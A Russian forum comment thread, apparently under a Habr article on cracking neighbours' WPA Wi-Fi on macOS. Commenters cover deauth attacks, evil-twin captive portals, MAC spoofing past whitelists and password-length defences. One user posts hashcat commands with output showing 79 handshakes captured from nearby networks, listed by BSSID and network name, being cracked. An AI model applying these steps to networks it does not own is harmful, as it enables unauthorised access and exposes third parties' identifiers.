    Есть варианты запустить / пересобрать hashcat на CPU или с менее требовательным к объёму видеопамяти алгоритмом?


    1. mobilz Автор
      27.01.2018 19:24

      ломать на маке хэши это просто спорт, есть куча сервисов, которые делают это за тебя. например, тут про такой писали


      1. pewpew
        27.01.2018 19:35

        Это и так понятно. 100 рублей за расшифровку мне жаль. Учитывая, что нтерес сугубо спортивный. Кстати я уже ответил на свой вопрос. Порывшись, нашёл hashcat-legacy и даже скомпилил его на маке. Это старая ветка проекта, работает на чистом CPU. Умеет чуть меньше. Но вцелом всё завелось. Нагружать проц я долго не стал. Удостоверился тому, что смог найти собственный пароль по словарю. Заодно приобщился к этой тулзе. Она и правда много может.


        1. mobilz Автор
          27.01.2018 19:44

          обидно, что jtr помер, но оно и понятно. зачем поддерживать jtr, если ты написал whatsapp ;)
          спасибо за инфу hashcat-legacy, надо запомнить.


          1. berez
            29.01.2018 21:42

            Как помер? Сейчас на гитхабе посмотрел — вроде живенький еще. Даже пара коммитов была на неделе.


  1. pilgr
    27.01.2018 15:43

    Вывод для тех, кто хочет защититься: используйте максимально длинные пароли со случайными символами.


    1. Sad_Bro
      27.01.2018 16:09
      +2

      еще WPS надо отключать.
      Есть еще вероломный способ. Меня не давно пытались так сломать) Глушат основную точку доступа, посылают пакеты деаутентификации, в это же время создается точка доступа с одноименным именем, соотв, на компе/ноутбуке/телефоне всплывает запрос на ввоз пароля. Ввели пароль и все, он у злоумышленника.


      1. BasicXP
        27.01.2018 17:03

        С WPA/WPA2 так не работает, схема аутентификации требует знание ключа с обеих сторон соединения.


        1. mobilz Автор
          27.01.2018 17:26

          с wep было весело ))


        1. zartarn
          29.01.2018 09:54

          Так то нет. Делается открытая точка с таким же ESSID BSSID, основная заспамливается пакетами. При подключении к отрытой, с поднятого на ней сервере идет переадресация на страницу «для авторизации введите пароль от WiFi».
          Airgeddon


      1. mobilz Автор
        27.01.2018 17:19

        я как-то жил в хате над салоном красоты ) так же вифи добывал ) это ржачно )


      1. Areso
        27.01.2018 17:39

        Это не во всех ОС работает. В некоторых пишет, что сеть поменялась. Только не помню, где, в Линухе или в Винде видел. Кажись в винде.
        У меня два смартфона с одинаковым названием хотспота. Кажись винда ругалась, когда я менял с одной точки на другую.


        1. SamsonovAnton
          27.01.2018 18:01

          Оно опознаётся по BSSID, генерируемому на основе MAC-адреса точки доступа. Если работать под тем же BSSID, то, наверное, никто подмены не заметит.


        1. vorphalack
          27.01.2018 20:13

          7 винда точно встанет в позу если настройки шифрования меняются. я из-за этого был вынужден на телефонах и карманном модеме разные названия сетей делать, тк там wpa/wpa2 в зависимости от девайса и винда вставала в позу.


  1. nata16k8
    27.01.2018 17:56

    Не поленился и в роутере с WiFi завел белый список с MAC семейных WiFi-устройств, которым нужен интернет.
    Вопрос автору: это поможет мне избавится от Вас?


    1. Areso
      27.01.2018 18:06
      +1

      Отвечу за автора: не совсем. Можно вытянуть MAC адреса ваших устройств из трафика (плевое дело), и поменять свой MAC адрес на адрес из белого списка. Во время работы двух устройств с одинаковым MAC адресом возможны сбои (или полная недоступность, или кто успел тот и съел, надо гуглить или смоделировать ситуацию для эксперимента), а вот во время отсутствия (MAC адрес телефона, а телефон в рабочие часы при владельце, а не дома) будет все тип-топ.


      1. mobilz Автор
        27.01.2018 19:29

        deauth на нужный мак и параллельно свой меняешь, профит.


        1. Areso
          27.01.2018 19:35

          Он же тоже будет пытаться подсоединиться обратно. Deauth будет работать только в случае «кто первый, того и тапки».


          1. mobilz Автор
            27.01.2018 19:46

            на практике deauth + мак эффективнее, чем просто замена мака.


            1. Areso
              27.01.2018 19:53

              Можно сделать хитрее. Купить что-нибудь небольшое с Линем на борту (одноплатник), поставить направленную антенну (или отражатель), направить в сторону соседа… и спамить deauth. Т.к. deauth выполняется на клиентском устройстве, то ваше будет чувствовать хорошо, а устройство соседа…
              Но честно, я считаю это уже вредительством, хоть вариант и рабочий.


              1. mobilz Автор
                27.01.2018 20:13

                хакера с солонкой никто не отменял. с чего вдруг сосед решил, что жить просто в этом мире? а вдруг он нагрешил, а ты длань господня и должен наказывать его за грехи (блин, что я несу?)


      1. dimas6000
        27.01.2018 19:30

        У меня было как-то раз, что на роутере работало два устройства с одним MAC, просто терялись пакеты в больших количествах. В принципе сайты можно было открывать, но ни поиграть, ни видео посмотреть, ни музыку послушать.


      1. id_potassium_chloride
        28.01.2018 23:35

        Два МАСа могут жить в одной сети. Проверял как-то раз. Ни роутер, ни клиенты ничего не почувствовали. Только когда на одном устройстве отключаюсь, то на втором тоже отсоединение происходит (видимо, первый посылает пакет деаутентификации, который сбивает связь у второго).


    1. mobilz Автор
      27.01.2018 19:29

      уже ответили за меня ) вытянуть из потока маки и поменять свой — задача 10 секунд, из них 9.99 нужно для нажатия клавиш )


  1. pashkov
    27.01.2018 19:25

    Интересно, нарушает ли публикация этой статьи какие-либо законы РФ?


    1. mobilz Автор
      27.01.2018 19:25

      даже если нет, в следующей сессии дума запретит


  1. LeqWiser
    27.01.2018 19:26

    На каждом месте, где бы я не находился, всегда есть сеть с паролем «1..8» или «1...0». И майнить ничего не приходится.


  1. Striizh
    27.01.2018 19:26

    Лицензируется, с 2011 года, вроде как. Вопрос в том, насколько поправки в закон о такси соблюдаются, но это уже совсем другая история...


    1. mobilz Автор
      27.01.2018 19:26

      нет, не лицензируется, это «ошибка» речи. Разрешается. Ты можешь получить «разрешение», а не лицензию.


  1. phnx
    27.01.2018 19:27

    Автор, прячь BSSID'ы и SSID'ы. Иначе, может, быть а-за-за! (-:

    habrahabr.ru/post/250267


    1. mobilz Автор
      27.01.2018 19:27

      вызов принят, поставлю большую бутылку виски, если вы найдёте меня


      1. Areso
        27.01.2018 19:56

        Главное, чтобы вызов не принял кто-то из отдела K, а то товарищу майору придется ставить нечто существенно большее… да и ресурсов у тов. майора может оказаться больше, чем BSSID и SSID.


        1. mobilz Автор
          27.01.2018 20:17

          вели меня как-то по 272 лет 5 ) я из титана, мне пофиг )


      1. WRP
        27.01.2018 20:29

        Да не будет никто вас искать. Не ищут же в большинстве случаев тех, кто сходил в лифте по нужде. А если поймают, то пластический хирург поможет. Потом.


        1. mobilz Автор
          27.01.2018 20:29

          казалось бы, но зачем мне сиськи?


          1. stychos
            27.01.2018 22:16

            А покажите, кому они не нравятся.


            1. mobilz Автор
              27.01.2018 22:23

              аргумент


      1. akirsanov
        27.01.2018 21:14

        trinzotoff


        1. mobilz Автор
          27.01.2018 22:24

          ага ) и?


      1. x86corez
        27.01.2018 22:17

        Москва, ул. Автозаводская, 23к7

        Угадал? ;)


        1. mobilz Автор
          27.01.2018 22:23

          тепло, соседи? ) дальше?


          1. x86corez
            27.01.2018 22:27

            Дальше надо на местность выезжать с пеленгатором :D


            1. mobilz Автор
              27.01.2018 23:29

              мак свой сменил, соседнему роутеру поставил мой старый мак, имя телефона поменял. что дальше? )


              1. nidalee
                28.01.2018 07:17

                Все, добились чего от вас хотел phnx
                А-за-за не будет.


  1. s256
    27.01.2018 22:13

    Статья прям повеяла началом 2000х из журнала Хакер :)

    PS Странно что никто еще не придумал крипту с брутфорсом паролей в качестве pow


  1. maxloyko
    27.01.2018 22:13

    взломал сам себя за 2 сек… ахереть теперь(


    1. mobilz Автор
      27.01.2018 22:13

      раскусил (


      1. maxloyko
        29.01.2018 00:34
        +1

        это я про себя


  1. Alesh
    27.01.2018 22:14

    Зачёт, главное что бы сосед оказался не более хитро выешитым ;)


    1. mobilz Автор
      27.01.2018 22:24

      спортивный интерес ) надо заказать установщика )


  1. Dark_Purple
    27.01.2018 22:32

    А это легально?


    1. mobilz Автор
      27.01.2018 23:30

      писать на хабр статьи? использовать стандартные утилиты макоси?


  1. Xadok
    27.01.2018 22:52

    Что за времена, хакеры перебрались на макос


    1. x86corez
      27.01.2018 23:28

      Честно признаться, если бы не эта статья, то я бы не узнал, что на OS X есть режим монитора Wi-Fi из коробки.


    1. mobilz Автор
      27.01.2018 23:30

      на freebsd с удобным интерфейсом.


    1. keydon2
      28.01.2018 00:28

      Не хакеры же. а скрипткидди.


      1. mobilz Автор
        28.01.2018 00:40

        я так и написал, что я скрипткидди


        1. keydon2
          28.01.2018 06:33

          Я отвечал Xadok.


  1. Methos
    28.01.2018 11:48
    -1

    Попробуй взломать мой 32-символьный пароль, а не блондинистые простые


    1. mobilz Автор
      28.01.2018 17:26
      +1

      пока я есть, тебе приходится говорить друзьям 32-х символьный пасс каждый раз ) и объяснять, что такое 31337. меня греет эта мысль


      1. GAS_85
        29.01.2018 12:41

        Не обязательно. У меня сетка для гостей со всяческими ограничениями торрентов и 18+ страниц и т.д., так пароль скажем всего 25 +- символов, но приятным человеческим предложением. Его и писать легко, и взломать сложно. Это А просто, и Б безопаснее чем короткий пароль и не оставляет дыры, как новомодный WPS.


      1. alexyr
        29.01.2018 14:13

        для друзей есть гостевая сеть с изоляцией поднимаемая на openwrt по команде через телеграм -.-


  1. iceMercy
    28.01.2018 12:04
    +1

    Почти ностальгия.
    Картина: середина 2000-х, провинциальный городок в 100 км от Питера, какому-то ламмеру взбрело сделать платный wi-fi интернет по городу. На тот момент мне лет ~14 и я читаю журналы «Хакер». С ними в комплекте есть диски с прогами (интернет в тот момент был isdn).
    Итог: сеть без пароля, без шифрования и доступ к инету осуществлялся по mac-адресу, все директории в локальном личном кабинете открыты и доступны для редактирования.


  1. Dn4g
    28.01.2018 17:28

    Анализатор в независимости от времени пишет файлы вида (null)_ch6_2018-01-28_14.48.54.pcap
    Хотя канал выбрал самый забитый.


    1. mobilz Автор
      28.01.2018 17:29

      обновись. некоторые жалуются на подобные баги, решается обновлением оси


      1. Dn4g
        28.01.2018 17:36

        Не совсем по теме, но сравнивая 10 айос и 11, последний совсем не нравится + истерии по поводу занижения производительности.
        Есть ли такая разница между Sierra и High Sierra?


        1. mobilz Автор
          28.01.2018 18:32

          хз, хайсиерра, полёт нормальный. сам обновляюсь только когда что-то не работает. на хайсиеру перешел только потому, что новый xcode отказывался ставиться на сиеру


          1. gearbox
            28.01.2018 20:22

            первый билд был сырой — дотнет вообще не ставился, по мелочи косяки вылезали повсеместно. После патча — да, терпимо.


  1. venrok
    28.01.2018 18:39

    Если поймают на взломе и докажут, какое собственно за это идет наказание? (Например если сосед тоже шарит, и открученных ушей ему будет недостаточно)


    1. mobilz Автор
      28.01.2018 20:47

      272 укрф, но чтобы прикрутить её к вам (мне, не важно кому), надо чтобы вы сами сознались. иначе это почти невозможно.


  1. SONANT
    29.01.2018 12:57

    А представим, на минуточку, что сосед хотел, что бы кто то взломал его wifi…


  1. DSLow
    29.01.2018 13:09

    Допуск по белому листу это ведь не сломает? :thinking:


    1. Loki3000
      29.01.2018 13:24

      Белый лист проверяет MAC адрес. А его, в беспроводной сети, можно отправить любой.


    1. mobilz Автор
      29.01.2018 16:25

      я всё равно смогу сниффать канал, всё равно найду вашу сеть и рукопожатия, если удастся их сломать, но почему-то не смогу подключиться к сети — пойму, что вы фильтруете маки, поэтому я просто посмотрю, какие маки в вашей сети нормально себя чувствуют и поставлю себе такой-же.


      1. DSLow
        29.01.2018 16:52

        Таки как защититься-то :thinking:


        1. zartarn
          29.01.2018 17:16

          Только буквеноцифровые пароль и побольше. А так же не вестись на всплывающие окна «введите пароль от тд», как во всяких тц. Так как поднятие точки доступа близнеца с перехватывающим порталом сейчас делается оч просто. Даже знания не нужны. Просто последовательно выбираешь параметры в консоли.


        1. springimport
          29.01.2018 17:49

          Я думаю что пароль 16+ и слабый роутер живя на 16+ этаже с домофоном :)


        1. mobilz Автор
          29.01.2018 19:15

          длинный пароль ) ниже уже писали. другое дело, насколько сильно вы хотите обезопаситься и зачем? ))


  1. vel
    29.01.2018 22:18

    на моем Маке нет кнопки Alt!!! что делать??


    1. mobilz Автор
      29.01.2018 22:19

      жми на option!!!


  1. ildarchegg
    30.01.2018 08:43

    Коллеги по идее. В результате пары часов сниффинга в вечернее время я заимел файл:

    Ildars-MacBook-Pro:naive-hashcat ildar$ sudo ls -lh /var/tmp
    -rw-r--r--  1 ildar          wheel    219M Jan 29 19:52 (null)_ch11_2018-01-29_18.31.02.pcap
    

    Первое мое сомнение — «pcap» вместо ожидаемого «wcap».

    Второе сомнение — это результат выполнения команды:
    Ildars-MacBook-Pro:src ildar$ ./cap2hccapx.bin /var/tmp/\(null\)_ch11_2018-01-29_18.31.02.pcap /var/tmp/home.hccapx
    /var/tmp/(null)_ch11_2018-01-29_18.31.02.pcap: Could not read pcap packet data
    Networks detected: 2942
    
    [*] BSSID=14:30:04:cd:1c:34 ESSID=Linh Ngan (Length: 9)
    [*] BSSID=f4:28:53:b7:10:e0 ESSID=Tra Mi (Length: 6)
    [*] BSSID=84:a9:c4:19:77:d0 ESSID=Tra Mi (Length: 6)
     --> STA=f4:28:01:b7:10:e0, Message Pair=0, Replay Counter=0
     --> STA=f4:28:01:b7:10:e0, Message Pair=2, Replay Counter=0
     --> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=0
     --> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=0
     --> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=1
     --> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=1
     --> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=1
     --> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=1
     --> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=4
     --> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=4
     --> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=4
     --> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=4
     --> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=4
     --> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=4
     --> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=4
     --> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=4
     --> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=4
     --> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=4
     --> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=10
     --> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=10
     --> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=18
     --> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=18
     --> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=18
     --> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=0
     --> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=0
     --> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=1
     --> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=2
     --> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=3
     --> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=4
     --> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=5
     --> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=6
     --> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=6
     --> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=6
     --> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=6
     --> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=0
     --> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=0
     --> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=1
     --> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=2
     --> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=3
     --> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=4
     --> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=5
     --> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=6
     --> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=6
     --> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=6
     --> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=6
     --> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=0
     --> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=0
     --> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=1
     --> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=2
     --> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=3
     --> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=4
     --> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=5
     --> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=6
     --> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=6
     --> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=6
     --> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=6
     --> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=0
     --> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=0
     --> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=1
     --> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=2
     --> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=3
     --> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=4
     --> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=5
     --> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=6
     --> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=6
     --> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=6
     --> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=6
     --> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=0
     --> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=0
     --> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=1
     --> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=2
     --> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=3
     --> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=4
     --> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=5
     --> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=6
     --> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=6
     --> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=6
     --> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=6
     --> STA=f4:28:02:b7:10:e0, Message Pair=2, Replay Counter=7
    [*] BSSID=f0:b4:29:44:5b:32 ESSID=PhamManh2 (Length: 9)
    [*] BSSID=14:30:04:c3:13:18 ESSID=Minh Tu (Length: 7)
    [*] BSSID=c4:e9:84:eb:bd:ea ESSID=Binh ThuonW (Length: 11)
    [*] BSSID=a0:8c:f8:91:1a:38 ESSID=? (Length: 15)
    [*] BSSID=c0:25:e9:c9:6f:6e ESSID=Huyen Anh (Length: 9)
    [*] BSSID=df:e9:84:eb:bd:ea ESSID=Binh Thuon? (Length: 11)
    [*] BSSID=9c:65:f9:22:0f:ab ESSID=HCE8FF (Length: 6)
    [*] BSSID=a0:65:18:b6:7f:78 ESSID=P9-16-09 (Length: 8)
    ....
    ....
    вот тут овер 3000 строк
    ....
    ....
    [*] BSSID=34:20:7f:b1:05:8c ESSID=An Tony (Length: 7)
    [*] BSSID=00:00:00:00:10:b5 ESSID=NTrung (Length: 6)
    [*] BSSID=a0:65:18:6d:48:ce ESSID=P12)119 (Length: 8)
    [*] BSSID=f0:d4:1f:44:5b:32 ESSID=PhamManh2 (Length: 9)
    [*] BSSID=63:b8:f4:c9:6f:6e ESSID=Huyen Anh (Length: 9)
    [*] BSSID=40:a9:5b:04:39:d4 ESSID=HoaNguyen (Length: 9)
    [*] BSSID=ad:65:18:b4:c9:63 ESSID=P12-16+ (Length: 8)
    [*] BSSID=a0:65:18:b4:51:6e ESSID=P12-1620 (Length: 8)
    [*] BSSID=87:a9:77:63:47:68 ESSID=?K2018 (Length: 6)
    [*] BSSID=f4:d4:72:b1:05:8c ESSID=An Tony (Length: 7)
    [*] BSSID=a0:65:18:ad:5a:32 ESSID=Song La? (Length: 8)
    [*] BSSID=a0:55:03:33:f6:1c ESSID=mixuxinh (Length: 8)
    [*] BSSID=26:91:54:77:44:20 ESSID= (Length: 16)
    [*] BSSID=e9:28:53:b7:10:e0 ESSID=Tra Mi (Length: 6)
    [*] BSSID=ad:65:18:7a:44:20 ESSID=Workbitch (Length: 9)
    [*] BSSID=20:70:1e:b4:a9:55 ESSID=P1???620 (Length: 8)
    [*] BSSID=c0:25:6a:ef:61:42 ESSID=Huyen Anh (Length: 9)
    [*] BSSID=74:65:18:b3:e3:7a ESSID=mixuxinh (Length: 8)
    [*] BSSID=2c:a7:f9:91:0e:ab ESSID=HCE8FF (Length: 6)
    [*] BSSID=22:30:04:c2:02:b4 ESSID=Trung Vu (Length: 8)
    [*] BSSID=a2:29:db:cf:ee:94 ESSID=HUAWE?'DPYT (Length: 11)
    [*] BSSID=c0:25:e9:49:b6:6e ESSID=Huyen Anh (Length: 9)
    [*] BSSID=18:cf:8c:cd:dd:65 ESSID=MM2018 (Length: 6)
    [*] BSSID=14:30:04:43:ca:18 ESSID=Minh Tu (Length: 7)
    [*] BSSID=c0:25:e9:c9:6f:7e ESSID=? (Length: 16)
    [*] BSSID=ad:55:03:b3:e3:7a ESSID=mix?inh (Length: 8)
    [*] BSSID=f4:4c:1f:87:05:8c ESSID=An Tony (Length: 7)
    [*] BSSID=14:30:04:c3:df:9e ESSID=Minh Tu (Length: 7)
    [*] BSSID=50:c7:bf:2a:72:09 ESSID=TP-LINK_72?\ (Length: 12)
    [*] BSSID=f4:4c:7f:81:1e:8c ESSID=An Tony (Length: 7)
    [*] BSSID=a0:65:7e:b6:39:0b ESSID=P9-08-09 (Length: 8)
    [*] BSSID=a7:65:18:b6:7f:78 ESSID=P9-16-09 (Length: 8)
    [*] BSSID=14:30:62:ce:1c:34 ESSID=Linh Ngan (Length: 9)
    [*] BSSID=a0:65:18:ad:e9:53 ESSID=S_ug Lam (Length: 8)
    [*] BSSID=14:56:07:cd:1c:34 ESSID=Linh Ngan (Length: 9)
    [*] BSSID=1b:ab:a7:2a:72:6f ESSID=TP-LI?J_7270 (Length: 12)
    [*] BSSID=a0:65:18:84:d2:63 ESSID=P12-1620 (Length: 8)
    [*] BSSID=36:fe:67:ba:9d:af ESSID=Thu Hien (Length: 8)
    [*] BSSID=06:b7:18:ba:28:20 ESSID=7Yr?!?Щ (Length: 9)
    [*] BSSID=f4:4c:e7:bc:05:8c ESSID=An Tony (Length: 7)
    [*] BSSID=c4:e9:1c:26:d1:ea ESSID=Binh Thuong (Length: 11)
    [*] BSSID=a0:65:f8:a5:c7:53 ESSID=P12-1620 (Length: 8)
    [*] BSSID=80:dd:71:63:9c:af ESSID=Thu Hien (Length: 8)
    [*] BSSID=78:30:04:c3:15:20 ESSID=HomeBB (Length: 6)
    [*] BSSID=ec:75:a2:4d:03:8c ESSID=An Tony (Length: 7)
    [*] BSSID=79:d6:19:b5:39:0b ESSID=P9?18M9 (Length: 8)
    [*] BSSID=f4:4c:7f:b1:c5:d4 ESSID=An Tony (Length: 7)
    [*] BSSID=18:d0:71:53:87:af ESSID=Thu Hien (Length: 8)
    [*] BSSID=18:d6:c7:a6:d2:42 ESSID=T?,LINK_5158 (Length: 12)
    [*] BSSID=53:93:ff:ff:ff:ff ESSID=TomBillTom2727 (Length: 14)
    [*] BSSID=92:2b:cb:ba:10:e0 ESSID=Tra Mi (Length: 6)
    [*] BSSID=19:30:04:cd:1c:34 ESSID=Linh Ngan (Length: 9)
    [*] BSSID=a0:65:18:7a:24:d6 ESSID=?orkl?ch (Length: 10)
    [*] BSSID=4a:cc:58:04:39:d4 ESSID=HoaNguyen (Length: 9)
    [*] BSSID=18:d0:71:63:dc:1a ESSID=Thu Hien (Length: 8)
    [*] BSSID=f9:df:37:2f:e0:5a ESSID=.brun? (Length: 6)
    [*] BSSID=4d:bb:09:f6:a9:7f ESSID=HomeBB (Length: 6)
    [*] BSSID=14:30:04:c3:13:67 ESSID=Minh Tu (Length: 7)
    [*] BSSID=6c:8d:79:b1:05:8c ESSID=An Ton (Length: 7)
    [*] BSSID=a0:65:18:e2:49:93 ESSID=Workbitch (Length: 9)
    [*] BSSID=a0:05:42:25:f3:bd ESSID=P9-08-09 (Length: 8)
    [*] BSSID=ad:65:18:b5:39:0b ESSID=P9-08-09 (Length: 8)
    [*] BSSID=f4:4c:7f:b1:05:ec ESSID=An Tony (Length: 7)
    [*] BSSID=2d:4c:7f:b1:65:ba ESSID=An Tony (Length: 7)
    [*] BSSID=18:d6:07:ca:51:58 ESSID=TP-LINK_5158 (Length: 12)
    [*] BSSID=9c:50:ee:af:39:02 ESSID=NTrung (Length: 6)
    [*] BSSID=f4:4c:7f:b1:c5:e0 ESSID=An Tony (Length: 7)
    [*] BSSID=c4:e9:84:3d:7c:ea ESSID=??$.W[hu/e (Length: 11)
    [*] BSSID=60:63:18:7a:44:20 ESSID=Workbitch (Length: 9)
    [*] BSSID=f4:28:93:65:11:ec ESSID=Tra Mi (Length: 6)
    [*] BSSID=18:d6:c7:57:d8:8c ESSID=TP-LINK_D58C (Length: 12)
    [*] BSSID=a0:5f:08:ce:ee:94 ESSID=HUAWEI-GPYT (Length: 11)
    [*] BSSID=6c:25:53:b7:10:e0 ESSID=Tra Mi (Length: 6)
    [*] BSSID=c4:d9:53:ed:bd:ea ESSID=Binh Thuong (Length: 11)
    [*] BSSID=5c:65:18:b3:e3:7a ESSID=mixuxinh (Length: 8)
    [*] BSSID=18:10:9d:ba:9c:af ESSID=Thu Hien (Length: 8)
    [*] BSSID=48:1b:5d:6b:ee:ce ESSID=PhamM?oh (Length: 8)
    
    Written 79 WPA Handshakes to: /var/tmp/home.hccapx
    

    Смутило сообщение «Could not read pcap packet data» и «Networks detected: 2942».

    Ну а финальный шаг за ночь ничего (как я понимаю не сделал):
    Ildars-MacBook-Pro:naive-hashcat ildar$ HASH_FILE=/var/tmp/home.hccapx POT_FILE=home-wifi.txt HASH_TYPE=2500 ./naive-hashcat.sh
    hashcat (v4.0.1-122-g5b527f6a) starting...
    
    OpenCL Platform #1: Apple
    =========================
    * Device #1: Intel(R) Core(TM) i5-5257U CPU @ 2.70GHz, skipped.
    * Device #2: Intel(R) Iris(TM) Graphics 6100, 384/1536 MB allocatable, 48MCU
    
    Hashes: 79 digests; 77 unique digests, 1 unique salts
    Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
    Rules: 1
    
    Applicable optimizers:
    * Zero-Byte
    * Single-Salt
    * Slow-Hash-SIMD-LOOP
    
    Password length minimum: 8
    Password length maximum: 63
    
    Watchdog: Temperature abort trigger disabled.
    
    Dictionary cache hit:
    * Filename..: dicts/rockyou.txt
    * Passwords.: 14344384
    * Bytes.....: 139921497
    * Keyspace..: 14344384
    
    [s]tatus [p]ause [b]ypass [c]heckpoint [q]uit => s
    
    Session..........: hashcat
    Status...........: Running
    Hash.Type........: WPA/WPA2
    Hash.Target......: /var/tmp/home.hccapx
    Time.Started.....: Tue Jan 30 12:40:16 2018 (23 secs)
    Time.Estimated...: Tue Jan 30 14:44:27 2018 (2 hours, 3 mins)
    Guess.Base.......: File (dicts/rockyou.txt)
    Guess.Queue......: 1/1 (100.00%)
    Speed.Dev.#2.....:     1923 H/s (7.33ms)
    Recovered........: 0/77 (0.00%) Digests, 0/1 (0.00%) Salts
    Progress.........: 58822/14344384 (0.41%)
    Rejected.........: 46534/58822 (79.11%)
    Restore.Point....: 37101/14344384 (0.26%)
    Candidates.#2....: 25241981 -> danielle06
    
    [s]tatus [p]ause [b]ypass [c]heckpoint [q]uit => s
    
    Session..........: hashcat
    Status...........: Running
    Hash.Type........: WPA/WPA2
    Hash.Target......: /var/tmp/home.hccapx
    Time.Started.....: Tue Jan 30 12:40:16 2018 (40 secs)
    Time.Estimated...: Tue Jan 30 15:37:00 2018 (2 hours, 56 mins)
    Guess.Base.......: File (dicts/rockyou.txt)
    Guess.Queue......: 1/1 (100.00%)
    Speed.Dev.#2.....:     1346 H/s (7.33ms)
    Recovered........: 0/77 (0.00%) Digests, 0/1 (0.00%) Salts
    Progress.........: 119394/14344384 (0.83%)
    Rejected.........: 82530/119394 (69.12%)
    Restore.Point....: 101786/14344384 (0.71%)
    Candidates.#2....: emilyrocks -> iloveyou85
    
    [s]tatus [p]ause [b]ypass [c]heckpoint [q]uit => 
    

    Т.е. файл home-wifi.txt оказался пуст. Что я мог упустить?


    1. mobilz Автор
      30.01.2018 09:57

      у вас получился очень большой файл, всего было поймано 79 хендшейков. либо выберите парочку конкретную, либо хотя бы надо удалить дубли. Либо можно уменьшить словарь, взять типа топ1000 wpa паролей.
      а в остальном всё верно


      1. ildarchegg
        30.01.2018 10:05

        Спасибо отклик)
        Только пока не могу сообразить как выдернуть парочку отдельных хендшейков. Посмотрел первые строки:

        Ildars-MacBook-Pro:~ ildar$ head -n 10 /var/tmp/home.hccapx 
        HCPXTra Mi??	?????\A]???6???w?2?gwuG??g?KR?})?tCCgwO??????(??s??=?;?N?![HsX?!??z???eB#n4??yu
        s??=?;?N?![HsX?!??z???eB#n4??0???HCPXTra Mi??	?????\A]???6???w?2?gwuG??g?KR?})?tCCgwO??????(??s??=?;?N?![HsX?!??z???eB#n4??yu
